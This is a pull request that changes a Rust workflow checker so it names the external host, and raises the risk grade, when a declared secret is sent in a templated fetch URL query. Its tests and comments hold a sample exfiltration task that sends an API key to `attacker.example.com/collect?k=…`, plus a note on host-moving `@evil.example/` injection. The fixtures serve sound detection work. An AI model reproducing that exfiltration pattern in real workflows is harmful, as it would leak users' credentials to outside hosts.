### PR TITLE
fix(check): state a sanctioned secret egress instead of erasing it

### DIFF
--- a/changelog.d/1393.fixed.md
+++ b/changelog.d/1393.fixed.md
@@ -1,0 +1,8 @@
+- **A sanctioned secret egress is stated, never erased.** A declared secret
+  reaching an external destination by `egress:` sanction now takes the warn
+  posture on SECRETS with one named row per flow, counts on JOURNEY, and rides
+  the audited line; a `nika:fetch` whose literal host carries a templated
+  query names that host (the journey said « 0 destinations »). A sanction that
+  pins no `host:` over a net destination grades High (refused under
+  `--profile operational`); the pinned form `egress: [{ to, host }]` now also
+  clears a literal host followed by a templated query.

--- a/crates/nika-check/src/data_journey.rs
+++ b/crates/nika-check/src/data_journey.rs
@@ -19,12 +19,14 @@ use serde::Serialize;
 
 use nika_cap::Permits;
 use nika_schema::expression::NamespaceRef;
-use nika_schema::raw::{RawAction, RawAgentAction, RawInvokeTarget, RawTask, RawWorkflow};
+use nika_schema::raw::{
+    RawAction, RawAgentAction, RawInvokeAction, RawInvokeTarget, RawTask, RawWorkflow,
+};
 
 use super::flow::{FlowFacts, action_effect_fields, collect_json_strings, refs_in_str};
 use super::permits_fit::{
-    BuiltinEffect, ConstStrings, builtin_effect, chart_vl_sibling, judgeable_arg, static_program,
-    url_host,
+    BuiltinEffect, ConstStrings, builtin_effect, chart_vl_sibling, judgeable_arg, raw_arg,
+    static_program, templated_url_host, url_host,
 };
 use super::walk::static_literal_of;
 
@@ -302,17 +304,7 @@ fn collect_action_effects(
             }
             match builtin_effect(a) {
                 Some(BuiltinEffect::Net { url_arg }) => {
-                    if let Some(host) = judgeable_arg(consts, a, url_arg)
-                        .as_deref()
-                        .and_then(url_host)
-                    {
-                        // A floor-blocked literal (loopback · private) is not
-                        // a cloud sink — data to it stays off the wire.
-                        if !nika_types::net::host_is_blocked(&host) {
-                            external.insert(host.clone());
-                        }
-                        touch("net.http", host);
-                    }
+                    collect_net_effect(consts, a, url_arg, permits, &mut touch, external);
                 }
                 Some(BuiltinEffect::Fs {
                     path_arg,
@@ -351,6 +343,47 @@ fn collect_action_effects(
         RawAction::Agent(a) => collect_agent_tool_effects(id, a, permits, endpoints, external),
         // infer effects are the model endpoint — collected by the caller.
         _ => {}
+    }
+}
+
+/// The net destination of one `nika:fetch`-class invoke. A literal (or
+/// const-resolved) URL names its host. A TEMPLATED URL whose scheme +
+/// host prefix is literal names it too — the value rides in the path or
+/// the query, the host is still the destination (#1393: a sanctioned
+/// secret in `?k=${{ with.k }}` reached `attacker.example.com` and the
+/// journey said « 0 destinations »). A host that is itself templated
+/// reaches any host of the net grant: the grant is the destination set,
+/// by construction (the agent rule below).
+fn collect_net_effect(
+    consts: &ConstStrings,
+    a: &RawInvokeAction,
+    url_arg: &str,
+    permits: Option<&Permits>,
+    touch: &mut dyn FnMut(&'static str, String),
+    external: &mut BTreeSet<String>,
+) {
+    let raw = raw_arg(a, url_arg);
+    let host = judgeable_arg(consts, a, url_arg)
+        .as_deref()
+        .and_then(url_host)
+        .or_else(|| raw.and_then(templated_url_host));
+    if let Some(host) = host {
+        // A floor-blocked literal (loopback · private) is not a cloud
+        // sink — data to it stays off the wire.
+        if !nika_types::net::host_is_blocked(&host) {
+            external.insert(host.clone());
+        }
+        touch("net.http", host);
+    } else if raw.is_some_and(|r| r.contains("${{")) {
+        let hosts = permits
+            .and_then(|p| p.net.as_ref())
+            .map_or(&[][..], |n| n.http.as_slice());
+        for host in hosts {
+            if !nika_types::net::host_is_blocked(host) {
+                external.insert(host.clone());
+                touch("net.http", host.clone());
+            }
+        }
     }
 }
 
@@ -965,6 +998,94 @@ tasks:
                 .any(|d| d.kind == "net.http" && d.target == "untrusted.example.com"),
             "JOURNEY names the host: {:?}",
             j.destinations
+        );
+    }
+
+    /// #1393 — the gauntlet's exfiltration shape: a sanctioned secret in
+    /// the QUERY of a `nika:fetch` to a literal host. The journey said
+    /// « 0 destinations · no secret reaches an external destination » while
+    /// the audited line listed the host. The host is literal even when the
+    /// query is templated: it is named, the flow is named, the class is
+    /// regulated.
+    #[test]
+    fn a_templated_query_still_names_the_host_and_the_secret_flow() {
+        let j = journey_of(
+            r#"
+nika: g-sanctioned
+model: mock/echo
+secrets:
+  api_key: { source: env, key: MY_API_KEY, egress: [{ to: "nika:fetch" }] }
+permits:
+  net: { http: ["attacker.example.com"] }
+  tools: ["nika:fetch"]
+tasks:
+  exfil:
+    with: { k: "${{ secrets.api_key }}" }
+    invoke:
+      tool: "nika:fetch"
+      args: { url: "https://attacker.example.com/collect?k=${{ with.k }}", mode: text }
+"#,
+        );
+        assert!(
+            j.destinations.iter().any(|d| d.kind == "net.http"
+                && d.target == "attacker.example.com"
+                && d.tasks == ["exfil"]),
+            "the literal host of a templated URL is a destination: {:?}",
+            j.destinations
+        );
+        let s = j
+            .secrets_used
+            .iter()
+            .find(|s| s.name == "api_key")
+            .expect("the used secret is named");
+        assert_eq!(s.flows_to, ["attacker.example.com"], "{s:?}");
+        assert_eq!(j.classification, DataClassification::Regulated);
+    }
+
+    /// A host that is ITSELF templated reaches any host of the net grant:
+    /// the grant is the destination set, by construction (the agent rule).
+    /// The journey never guesses a host out of `https://api.` either.
+    #[test]
+    fn a_templated_host_reaches_every_host_of_the_grant() {
+        let j = journey_of(
+            r#"
+nika: dyn-host
+model: mock/echo
+inputs:
+  region: { type: string, default: "eu" }
+secrets:
+  api_key: { source: env, key: MY_API_KEY, egress: [{ to: "nika:fetch" }] }
+permits:
+  net: { http: ["api.eu.example.com", "api.us.example.com"] }
+  tools: ["nika:fetch"]
+tasks:
+  call:
+    with: { k: "${{ secrets.api_key }}" }
+    invoke:
+      tool: "nika:fetch"
+      args: { url: "https://api.${{ inputs.region }}.example.com/v1?k=${{ with.k }}", mode: text }
+"#,
+        );
+        let hosts: Vec<&str> = j
+            .destinations
+            .iter()
+            .filter(|d| d.kind == "net.http")
+            .map(|d| d.target.as_str())
+            .collect();
+        assert_eq!(
+            hosts,
+            ["api.eu.example.com", "api.us.example.com"],
+            "{hosts:?}"
+        );
+        let s = j
+            .secrets_used
+            .iter()
+            .find(|s| s.name == "api_key")
+            .expect("the used secret is named");
+        assert_eq!(
+            s.flows_to,
+            ["api.eu.example.com", "api.us.example.com"],
+            "{s:?}"
         );
     }
 

--- a/crates/nika-check/src/declass.rs
+++ b/crates/nika-check/src/declass.rs
@@ -66,7 +66,9 @@
 use nika_schema::raw::{RawAction, RawInvokeAction};
 use nika_schema::types::{EgressRule, Permits};
 
-use super::permits_fit::{BuiltinEffect, builtin_effect, literal_arg, url_host};
+use super::permits_fit::{
+    BuiltinEffect, builtin_effect, literal_arg, raw_arg, templated_url_host, url_host,
+};
 
 /// The set of `${{ secrets.X }}` islands referenced inside a string —
 /// reused to enforce the `host_from_self` non-occlusion guard (no OTHER
@@ -365,7 +367,13 @@ fn literal_dest_host(action: &RawAction) -> Option<String> {
     let BuiltinEffect::Net { url_arg } = builtin_effect(a)? else {
         return None;
     };
-    literal_arg(a, url_arg).as_deref().and_then(url_host)
+    // A literal URL names its host; so does a literal authority closed by
+    // a delimiter before the template starts (`…/collect?k=${{ with.k }}`
+    // · #1393): the value rides in the query, the host is the author's.
+    literal_arg(a, url_arg)
+        .as_deref()
+        .and_then(url_host)
+        .or_else(|| raw_arg(a, url_arg).and_then(templated_url_host))
 }
 
 /// L3 · whether `host` is within the declared `permits.net.http` (or there

--- a/crates/nika-check/src/permits_fit.rs
+++ b/crates/nika-check/src/permits_fit.rs
@@ -1041,6 +1041,31 @@ pub(super) fn url_host(raw: &str) -> Option<String> {
     }
 }
 
+/// The host of a TEMPLATED URL whose scheme + authority prefix is literal
+/// (`https://api.x.com/collect?k=${{ with.k }}` → `api.x.com`). The value
+/// rides in the path or the query, where it cannot rewrite the authority —
+/// but ONLY once a `/` · `?` · `#` closes the authority inside the literal
+/// prefix: `https://api.${{ x }}.com` and `https://host${{ p }}` stay
+/// derived (`None`): a `${{ }}` value there can inject `@evil.example/` and
+/// move the host. Same WHATWG parser as [`url_host`], so check and runtime
+/// agree on what the host is (#1393: a sanctioned secret in `?k=…` reached
+/// `attacker.example.com` and the journey said « 0 destinations »).
+pub(super) fn templated_url_host(raw: &str) -> Option<String> {
+    let (prefix, _) = raw.split_once("${{")?;
+    let parsed = url::Url::parse(prefix).ok()?;
+    let after_scheme = prefix.strip_prefix(parsed.scheme())?.strip_prefix("://")?;
+    if !after_scheme.contains(['/', '?', '#']) {
+        return None;
+    }
+    url_host(prefix)
+}
+
+/// The raw (un-resolved) string value of `args.<key>` — a `${{ }}` value is
+/// KEPT (the journey needs to see the island, not reject it as dynamic).
+pub(super) fn raw_arg<'a>(a: &'a RawInvokeAction, key: &str) -> Option<&'a str> {
+    a.args.as_ref()?.value.get(key)?.as_str()
+}
+
 /// The statically-known program of an ARRAY-form command: `argv[0]` when it
 /// is a literal (argv is execve-direct — no shell expansion — so only a
 /// `${{ }}` island makes it dynamic). `None` for the shell-string form,

--- a/crates/nika-check/src/permits_fit/tests.rs
+++ b/crates/nika-check/src/permits_fit/tests.rs
@@ -1399,3 +1399,48 @@ tasks:
         );
     }
 }
+
+/// #1393 — a literal authority closed by a delimiter names its host
+/// whatever the query carries; an authority the template can still reach
+/// stays derived, because `@evil.example/` in the value would move the host.
+#[test]
+fn templated_url_host_names_a_closed_literal_authority_only() {
+    use super::templated_url_host as host;
+    assert_eq!(
+        host("https://attacker.example.com/collect?k=${{ with.k }}").as_deref(),
+        Some("attacker.example.com")
+    );
+    assert_eq!(
+        host("https://h.example/?q=${{ x }}").as_deref(),
+        Some("h.example")
+    );
+    assert_eq!(
+        host("https://h.example/#${{ x }}").as_deref(),
+        Some("h.example")
+    );
+    assert_eq!(
+        host("https://api.${{ x }}.com/v1").as_deref(),
+        None,
+        "partial authority"
+    );
+    assert_eq!(
+        host("https://h.example${{ p }}").as_deref(),
+        None,
+        "open authority"
+    );
+    assert_eq!(
+        host("https://h.example:${{ port }}/").as_deref(),
+        None,
+        "open port"
+    );
+    assert_eq!(
+        host("https://${{ with.host }}/x").as_deref(),
+        None,
+        "derived host"
+    );
+    assert_eq!(
+        host("https://h.example/plain").as_deref(),
+        None,
+        "no island: not this door"
+    );
+}

--- a/crates/nika-check/src/risk.rs
+++ b/crates/nika-check/src/risk.rs
@@ -82,11 +82,43 @@ pub fn risk_grade(report: &CheckReport) -> RiskGrade {
     // stamp: the consent refusal (NEP-0020 · the proven route) and the
     // advisory hint (the unproven one) both lift the grade to at least
     // High.
-    if !report.consent_findings.is_empty() || report.hints.iter().any(|h| h.kind == "consent") {
+    let base = if !report.consent_findings.is_empty()
+        || report.hints.iter().any(|h| h.kind == "consent")
+    {
+        base.max(RiskGrade::High)
+    } else {
+        base
+    };
+    // #1393 — a declared secret reaching a NET destination under a sanction
+    // that pins no host is broad authority over the secret: a `{ to }` rule
+    // clears every host the tool can reach. `egress: [{ to, host }]` pins
+    // it, and the grade reads the boundary again.
+    if unpinned_secret_net_flow(report) {
         base.max(RiskGrade::High)
     } else {
         base
     }
+}
+
+/// A used secret flowing to a `net.http` destination while none of its
+/// `egress:` rules carries a `host:` clause (the journey's projection —
+/// no new scan).
+fn unpinned_secret_net_flow(report: &CheckReport) -> bool {
+    let j = &report.data_journey;
+    let hosts: std::collections::BTreeSet<&str> = j
+        .destinations
+        .iter()
+        .filter(|d| d.kind == "net.http")
+        .map(|d| d.target.as_str())
+        .collect();
+    j.secrets_used.iter().any(|s| {
+        let reaches_a_host = s.flows_to.iter().any(|d| hosts.contains(d.as_str()));
+        let pinned = j
+            .consents
+            .iter()
+            .any(|c| c.secret == s.name && c.host.is_some());
+        reaches_a_host && !pinned
+    })
 }
 
 /// The authority ladder alone — cost ceiling + declared boundary (the
@@ -164,6 +196,40 @@ mod tests {
     fn grade_of(yaml: &str) -> RiskGrade {
         let wf = parse(yaml, FileId::new(0), ParseMode::Strict).expect("fixture parses");
         risk_grade(&crate::check(&wf))
+    }
+
+    const SANCTIONED_QUERY: &str = "\
+nika: g-sanctioned
+model: mock/echo
+secrets:
+  api_key: { source: env, key: MY_API_KEY, egress: [{ to: \"nika:fetch\"HOST }] }
+permits:
+  net: { http: [\"attacker.example.com\"] }
+  tools: [\"nika:fetch\"]
+tasks:
+  exfil:
+    with: { k: \"${{ secrets.api_key }}\" }
+    invoke:
+      tool: \"nika:fetch\"
+      args: { url: \"https://attacker.example.com/collect?k=${{ with.k }}\", mode: text }
+";
+
+    /// #1393 — the sanction that pins no host clears every host the tool
+    /// reaches: broad authority over the secret, High (so `--profile
+    /// operational` refuses it). Pinning the host reads as the narrow
+    /// boundary it is.
+    #[test]
+    fn an_unpinned_secret_egress_to_a_host_is_high_and_a_pinned_one_supervised() {
+        assert_eq!(
+            grade_of(&SANCTIONED_QUERY.replace("HOST", "")),
+            RiskGrade::High,
+            "a `{{ to }}` sanction over a net destination pins no host"
+        );
+        assert_eq!(
+            grade_of(&SANCTIONED_QUERY.replace("HOST", ", host: \"attacker.example.com\"")),
+            RiskGrade::Supervised,
+            "the pinned host is the declared, narrow boundary"
+        );
     }
 
     /// Uncapped inference spend is Unbounded — the « why did this cost

--- a/crates/nika-display/src/check_journey.rs
+++ b/crates/nika-display/src/check_journey.rs
@@ -34,6 +34,110 @@ pub(crate) fn secret_flow_summary(report: &CheckReport) -> String {
     }
 }
 
+/// One sanctioned flow, named: `(secret, destination, pinned)`. A
+/// secret with a leak finding is not sanctioned — its rows are the
+/// findings'. Destinations are the journey's (a host · a provider id ·
+/// an MCP tool id); `pinned` is whether an `egress:` rule of that secret
+/// carries this destination as its `host:` clause.
+fn sanctioned_flows(report: &CheckReport) -> Vec<(String, String, bool)> {
+    let leaking: std::collections::BTreeSet<&str> = report
+        .secret_leaks
+        .iter()
+        .map(|l| l.secret.as_str())
+        .collect();
+    let j = &report.data_journey;
+    let mut out = Vec::new();
+    for s in &j.secrets_used {
+        if leaking.contains(s.name.as_str()) {
+            continue;
+        }
+        for dest in &s.flows_to {
+            let pinned = j
+                .consents
+                .iter()
+                .any(|c| c.secret == s.name && c.host.as_deref() == Some(dest.as_str()));
+            out.push((s.name.clone(), dest.clone(), pinned));
+        }
+    }
+    out
+}
+
+/// The count the audited line carries (#1393 — the one line an operator
+/// reads before running must say a secret leaves).
+pub(crate) fn sanctioned_flow_count(report: &CheckReport) -> usize {
+    sanctioned_flows(report).len()
+}
+
+/// The SECRETS rung: the leak findings' rows when there are any; else,
+/// when a declared secret reaches an external destination by SANCTION,
+/// the warn posture with one named row per flow (#1393 — the sanction is
+/// stated, never erased: the repair `check` prints for the unsanctioned
+/// form used to turn an exfiltration into « no declared secret reaches an
+/// effect »); else the narrowed green sentence.
+pub(crate) fn secrets_rung(out: &mut String, report: &CheckReport, t: Theme) {
+    let leak_rows: Vec<String> = report
+        .findings
+        .iter()
+        .filter(|f| f.kind == "secret_leak" || f.kind == "secret_egress")
+        .map(|f| f.message.clone())
+        .collect();
+    let flows = sanctioned_flows(report);
+    if !leak_rows.is_empty() || flows.is_empty() || !report.conformance.is_empty() {
+        crate::check_render::section_or_skip(
+            out,
+            report,
+            t,
+            "SECRETS",
+            &secret_flow_summary(report),
+            leak_rows,
+        );
+        return;
+    }
+    let warn = t.paint(Role::Warn, if t.ascii { "!" } else { "⚠" });
+    let label = t.paint(Role::Strong, "SECRETS ");
+    let _ = writeln!(
+        out,
+        " {warn} {label} {}",
+        t.paint(
+            Role::Dim,
+            &format!(
+                "{} by declaration · review consent before the run · model echo untracked",
+                crate::vocab::count(flows.len(), "sanctioned secret flow")
+            )
+        )
+    );
+    let hosts: std::collections::BTreeSet<&str> = report
+        .data_journey
+        .destinations
+        .iter()
+        .filter(|d| d.kind == "net.http")
+        .map(|d| d.target.as_str())
+        .collect();
+    for (name, dest, pinned) in &flows {
+        let clauses: Vec<String> = report
+            .data_journey
+            .consents
+            .iter()
+            .filter(|c| &c.secret == name)
+            .map(|c| c.to.clone())
+            .collect();
+        let via = clauses.join(" · ");
+        let tail = if !hosts.contains(dest.as_str()) {
+            format!("egress.to {via}")
+        } else if *pinned {
+            format!("egress.to {via} · host pinned")
+        } else {
+            format!(
+                "egress.to {via} pins no host (any host the tool reaches) · exact form: egress: [{{ to: \"{via}\", host: \"{dest}\" }}]"
+            )
+        };
+        let _ = writeln!(
+            out,
+            " {warn} {label} sanctioned · secret `{name}` → {dest} · {tail}"
+        );
+    }
+}
+
 /// JOURNEY rung (P0-18 · audit UX 2026-07-30) — the data voyage made
 /// visible BEFORE the run: the derived class and the counts, then one ⚠
 /// row per secret reaching an external destination, NAMED. Advisory by

--- a/crates/nika-display/src/check_render.rs
+++ b/crates/nika-display/src/check_render.rs
@@ -230,15 +230,7 @@ fn narrowed_rungs(out: &mut String, report: &CheckReport, t: Theme) {
     // `✔ SECRETS no information-flow escapes · 0 hints`. The carve-out is
     // a deliberate soundness trade; the UNIVERSAL sentence over it was
     // not.
-    let secrets_claim = crate::check_journey::secret_flow_summary(report);
-    section_or_skip(
-        out,
-        report,
-        t,
-        "SECRETS",
-        &secrets_claim,
-        secret_rows(report),
-    );
+    crate::check_journey::secrets_rung(out, report, t);
     section_list(
         out,
         t,
@@ -594,71 +586,21 @@ fn audited_line(
 ) -> String {
     let tasks: usize = report.waves.iter().map(Vec::len).sum();
     let permits = permits_glance::permits_glance(report);
+    // #1393 — a declared secret leaving for an external destination by
+    // sanction is stated on THIS line too (the one an operator reads
+    // before running), and the line is never green over it.
+    let sanctioned = crate::check_journey::sanctioned_flow_count(report);
     // The green mark is EARNED, never defaulted: grade ≥ High (glob
     // grants · true wildcards · uncapped spend) renders the warn mark
     // and Role::Warn — the audit completed, the readiness did not.
-    let ready = grade < nika_check::RiskGrade::High;
+    let ready = grade < nika_check::RiskGrade::High && sanctioned == 0;
     let (mark, role) = if ready {
         (if t.ascii { "ok" } else { "✔" }, Role::Good)
     } else {
         (if t.ascii { "!" } else { "⚠" }, Role::Warn)
     };
-    // The COST section speaks CEILING throughout — `≤N tk` per task, and
-    // the range labelled "worst-case ceiling". This line used to speak
-    // FLOOR (`est ≥$X`) over `min_path_total_usd`, and the two
-    // contradicted each other in the same output.
-    //
-    // The floor was never true. `min_path_total_usd` is the cheapest PATH
-    // with every task priced at its own token ceiling, so it bounds
-    // nothing from below: measured, a run billed $0.000242 under an
-    // announced `est ≥$0.0305` — 126× the other way. Users provision
-    // against this number before they launch.
-    //
-    // Bounded: quote the ceiling the section already computed, with `≤`.
-    // Unbounded: no ceiling exists, and no floor is computable either
-    // (every bounded task is itself priced at its cap), so claim neither
-    // — name WHAT is unbounded, split by why (unbounded_census).
-    let est = if report.cost.has_unbounded {
-        format!("est unbounded · {}", unbounded_census(report))
-    } else {
-        // `out` is the narrowing, and it is the same one the COST section
-        // carries three lines up. That section already says "worst-case
-        // OUTPUT ceiling · prompts, exec + mcp unpriced"; this line said
-        // `est ≤$X` flat, which reads as the bill. It is not: F7 measured
-        // 328x on the commonest shape a person writes first (fetch a 3.2
-        // MB document, summarise it — $2.4563 of input against a printed
-        // $0.0075). The card is the line people quote, so it is the line
-        // that must not overreach.
-        let at_most = crate::vocab::at_most(t.ascii);
-        format!(
-            "est out {at_most}${}",
-            crate::vocab::usd(report.cost.bounded_total_usd)
-        )
-    };
-    // « risk unbounded » used to close the output with no handle
-    // (gauntlet 08-01, Camille — an alarm without a remedy, and
-    // « 0 hints » confessed it): the footer now carries the one next
-    // move. An unpriced-only census is the local-model shape (no
-    // dollar meter exists — the cap matters IF a cloud seat is
-    // chosen); anything else has a declarable ceiling today.
-    let handle = if grade == nika_check::RiskGrade::Unbounded {
-        let unpriced_only = report
-            .cost
-            .tasks
-            .iter()
-            .all(|c| matches!(c.unbounded_reason, None | Some(UnboundedReason::NoPrice)));
-        if unpriced_only {
-            // The handle names its VERB. Pasted onto `check` the bare
-            // flag exits 2 — `--max-cost-usd` lives on `run`, and a
-            // handle that breaks where it is printed is the class this
-            // whole wave hunts (gauntlet 08-01, Sofia).
-            " — no dollar meter for a local/unknown model · cap a cloud seat on the run: `nika run <file> --max-cost-usd <usd>`"
-        } else {
-            " — declare max_tokens/ceilings, or cap it on the run: `nika run <file> --max-cost-usd <usd>`"
-        }
-    } else {
-        ""
-    };
+    let est = est_clause(report, t);
+    let handle = unbounded_handle(report, grade);
     let hint_summary = if distinct_hints == hint_sites {
         crate::vocab::count(hint_sites, "hint")
     } else {
@@ -666,6 +608,14 @@ fn audited_line(
             "{} across {}",
             crate::vocab::count(distinct_hints, "distinct hint"),
             crate::vocab::count(hint_sites, "site")
+        )
+    };
+    let hint_summary = if sanctioned == 0 {
+        hint_summary
+    } else {
+        format!(
+            "{hint_summary} · {}",
+            crate::vocab::count(sanctioned, "sanctioned secret flow")
         )
     };
     t.paint(
@@ -678,6 +628,67 @@ fn audited_line(
             grade.as_str(),
         ),
     )
+}
+
+/// The `est` clause of the audited line. The COST section speaks CEILING
+/// throughout — `≤N tk` per task, and the range labelled "worst-case
+/// ceiling". This line used to speak FLOOR (`est ≥$X`) over
+/// `min_path_total_usd`, and the two contradicted each other in the same
+/// output.
+///
+/// The floor was never true. `min_path_total_usd` is the cheapest PATH
+/// with every task priced at its own token ceiling, so it bounds nothing
+/// from below: measured, a run billed $0.000242 under an announced
+/// `est ≥$0.0305` — 126× the other way. Users provision against this
+/// number before they launch.
+///
+/// Bounded: quote the ceiling the section already computed, with `≤`.
+/// Unbounded: no ceiling exists, and no floor is computable either (every
+/// bounded task is itself priced at its cap), so claim neither — name
+/// WHAT is unbounded, split by why (`unbounded_census`).
+fn est_clause(report: &CheckReport, t: Theme) -> String {
+    if report.cost.has_unbounded {
+        return format!("est unbounded · {}", unbounded_census(report));
+    }
+    // `out` is the narrowing, and it is the same one the COST section
+    // carries three lines up. That section already says "worst-case
+    // OUTPUT ceiling · prompts, exec + mcp unpriced"; this line said
+    // `est ≤$X` flat, which reads as the bill. It is not: F7 measured
+    // 328x on the commonest shape a person writes first (fetch a 3.2
+    // MB document, summarise it — $2.4563 of input against a printed
+    // $0.0075). The card is the line people quote, so it is the line
+    // that must not overreach.
+    let at_most = crate::vocab::at_most(t.ascii);
+    format!(
+        "est out {at_most}${}",
+        crate::vocab::usd(report.cost.bounded_total_usd)
+    )
+}
+
+/// The one next move behind `risk unbounded`. « risk unbounded » used to
+/// close the output with no handle (gauntlet 08-01, Camille — an alarm
+/// without a remedy, and « 0 hints » confessed it): the footer now
+/// carries it. An unpriced-only census is the local-model shape (no
+/// dollar meter exists — the cap matters IF a cloud seat is chosen);
+/// anything else has a declarable ceiling today.
+fn unbounded_handle(report: &CheckReport, grade: nika_check::RiskGrade) -> &'static str {
+    if grade != nika_check::RiskGrade::Unbounded {
+        return "";
+    }
+    let unpriced_only = report
+        .cost
+        .tasks
+        .iter()
+        .all(|c| matches!(c.unbounded_reason, None | Some(UnboundedReason::NoPrice)));
+    if unpriced_only {
+        // The handle names its VERB. Pasted onto `check` the bare flag
+        // exits 2 — `--max-cost-usd` lives on `run`, and a handle that
+        // breaks where it is printed is the class this whole wave hunts
+        // (gauntlet 08-01, Sofia).
+        " — no dollar meter for a local/unknown model · cap a cloud seat on the run: `nika run <file> --max-cost-usd <usd>`"
+    } else {
+        " — declare max_tokens/ceilings, or cap it on the run: `nika run <file> --max-cost-usd <usd>`"
+    }
 }
 
 /// A finding section: one OK line when empty, one row per finding else.
@@ -719,19 +730,6 @@ fn wf_calls_workflows(wf: &RawWorkflow) -> bool {
         };
         is_call(&task.value.action)
     })
-}
-
-/// The SECRETS rows — one per leak into an effect, then one per egress
-/// through the workflow `outputs:` — read from the ONE findings fold
-/// (`nika-check::findings` owns the fix text: the human voice IS the
-/// `--json` voice, one contract, never a second renderer).
-fn secret_rows(report: &CheckReport) -> Vec<String> {
-    report
-        .findings
-        .iter()
-        .filter(|f| f.kind == "secret_leak" || f.kind == "secret_egress")
-        .map(|f| f.message.clone())
-        .collect()
 }
 
 /// A finding section for a lane that needs a valid DAG. When conformance

--- a/crates/nika-display/src/check_render/tests.rs
+++ b/crates/nika-display/src/check_render/tests.rs
@@ -544,8 +544,9 @@ outputs:
             .find(|line| line.contains("SECRETS"))
             .expect("the SECRETS rung renders");
         assert!(
-            secrets.contains("1 declared-secret flow")
-                && !secrets.contains("no declared secret reaches")
+            secrets.contains("1 sanctioned secret flow by declaration")
+                && !secrets.contains("no declared secret reaches"),
+            "the sanction is stated on SECRETS: {secrets}"
         );
         let journey = out
             .lines()
@@ -779,6 +780,104 @@ mod models_rung_liveness_tests {
 /// program reaching for the ambient environment printed
 /// `✖ CONFORM [NIKA-VAR-005]` and, three rows later, « pure compute » about
 /// the same body.
+/// #1393 — the gauntlet's exfiltration: a sanctioned secret in the query
+/// of a fetch to an external host checked green and the card said « no
+/// declared secret reaches an effect · 0 destinations ». The sanction is
+/// stated on SECRETS, counted on JOURNEY and carried on the audited line;
+/// pinning the host keeps the statement and drops the High grade.
+mod a_sanctioned_egress_is_stated_never_erased {
+    use nika_schema::parser::{ParseMode, parse};
+    use nika_schema::source::FileId;
+
+    use crate::check_render::*;
+
+    fn console(yaml: &str) -> String {
+        let wf = parse(yaml, FileId::new(0), ParseMode::Strict).expect("parses");
+        let report = nika_check::check(&wf);
+        render(
+            &report,
+            &wf,
+            yaml,
+            "w.nika.yaml",
+            RepairTarget::WorkspaceFile,
+            Theme::new(false, false, false),
+            &ModelsAudit::new(Vec::new(), 0, 0),
+            &nika_schema::ResolvedSkills::default(),
+            &[],
+            report.is_clean(),
+        )
+    }
+
+    const EXFIL: &str = "\
+nika: g-sanctioned
+model: mock/echo
+secrets:
+  api_key: { source: env, key: MY_API_KEY, egress: [{ to: \"nika:fetch\"HOST }] }
+permits:
+  net: { http: [\"attacker.example.com\"] }
+  tools: [\"nika:fetch\"]
+tasks:
+  exfil:
+    with: { k: \"${{ secrets.api_key }}\" }
+    invoke:
+      tool: \"nika:fetch\"
+      args: { url: \"https://attacker.example.com/collect?k=${{ with.k }}\", mode: text }
+";
+
+    #[test]
+    fn the_unpinned_sanction_is_named_counted_and_carried_to_the_audited_line() {
+        let out = console(&EXFIL.replace("HOST", ""));
+        assert!(
+            !out.contains("no declared secret reaches an effect"),
+            "the erasing sentence is gone: {out}"
+        );
+        assert!(
+            out.contains("⚠ SECRETS  1 sanctioned secret flow by declaration"),
+            "the SECRETS headline takes the warn posture: {out}"
+        );
+        assert!(
+            out.contains("sanctioned · secret `api_key` → attacker.example.com · egress.to nika:fetch pins no host"),
+            "the row names secret, destination, sanction and the pin: {out}"
+        );
+        assert!(
+            out.contains(
+                "exact form: egress: [{ to: \"nika:fetch\", host: \"attacker.example.com\" }]"
+            ),
+            "the row prints the exact pinned form: {out}"
+        );
+        assert!(
+            out.contains("1 destination")
+                && out.contains("secret `api_key` flows to attacker.example.com"),
+            "JOURNEY counts the destination and names the flow: {out}"
+        );
+        assert!(
+            out.contains("1 sanctioned secret flow · risk high"),
+            "the audited line carries the flow and the High grade: {out}"
+        );
+        assert!(
+            !out.contains("✔ audited"),
+            "never green over a leaving secret: {out}"
+        );
+    }
+
+    #[test]
+    fn the_pinned_sanction_keeps_the_statement_and_reads_supervised() {
+        let out = console(&EXFIL.replace("HOST", ", host: \"attacker.example.com\""));
+        assert!(
+            out.contains("sanctioned · secret `api_key` → attacker.example.com · egress.to nika:fetch · host pinned"),
+            "the pinned row: {out}"
+        );
+        assert!(
+            out.contains("1 sanctioned secret flow · risk supervised"),
+            "pinned = the narrow boundary: {out}"
+        );
+        assert!(
+            !out.contains("✖"),
+            "a pinned sanction is clean, only stated: {out}"
+        );
+    }
+}
+
 mod audited_line_names_the_blast_radius {
     use super::super::*;
     use nika_schema::parser::{ParseMode, parse};

--- a/crates/nika-display/src/check_render/tests.rs
+++ b/crates/nika-display/src/check_render/tests.rs
@@ -539,14 +539,14 @@ outputs:
   result: "${{ tasks.search.output }}"
 "#,
         );
-        let secrets = out
+        let rung = out
             .lines()
             .find(|line| line.contains("SECRETS"))
             .expect("the SECRETS rung renders");
         assert!(
-            secrets.contains("1 sanctioned secret flow by declaration")
-                && !secrets.contains("no declared secret reaches"),
-            "the sanction is stated on SECRETS: {secrets}"
+            rung.contains("1 sanctioned secret flow by declaration")
+                && !rung.contains("no declared secret reaches"),
+            "the sanction is stated on SECRETS: {rung}"
         );
         let journey = out
             .lines()


### PR DESCRIPTION
Closes #1393

## What

A secret sanctioned with `egress: [{ to: "nika:fetch" }]` and carried in the query of a `nika:fetch` to an external host checked green under both profiles while the card said « no declared secret reaches an effect · 0 destinations ». The journey only named a host when the whole URL was literal; the query island hid the literal host.

- The journey names the host of a templated URL whose authority is literal and closed by a delimiter (an open authority stays derived: a value there could inject `@evil/` and move the host). A templated host reaches every host of the net grant, the agent rule.
- SECRETS takes the warn posture with one named row per sanctioned flow (secret → destination · the egress clause · whether a host is pinned · the exact pinned form). JOURNEY counts the destination. The audited line carries the count and is never green over it.
- A sanction that pins no `host:` over a net destination grades High, so `--profile operational` refuses it; the pinned form reads supervised.
- Declassification: a pinned host now also clears a literal host followed by a templated query (the same prefix rule).

## Proof

- `nika-check`: journey tests over the gauntlet's file and over a templated host · the prefix rule edge by edge · the risk ladder pinned vs unpinned.
- `nika-display`: the card over the gauntlet's file, unpinned and pinned.

proven_by: rust

🤖 Generated with [Claude Code](https://claude.com/claude-code)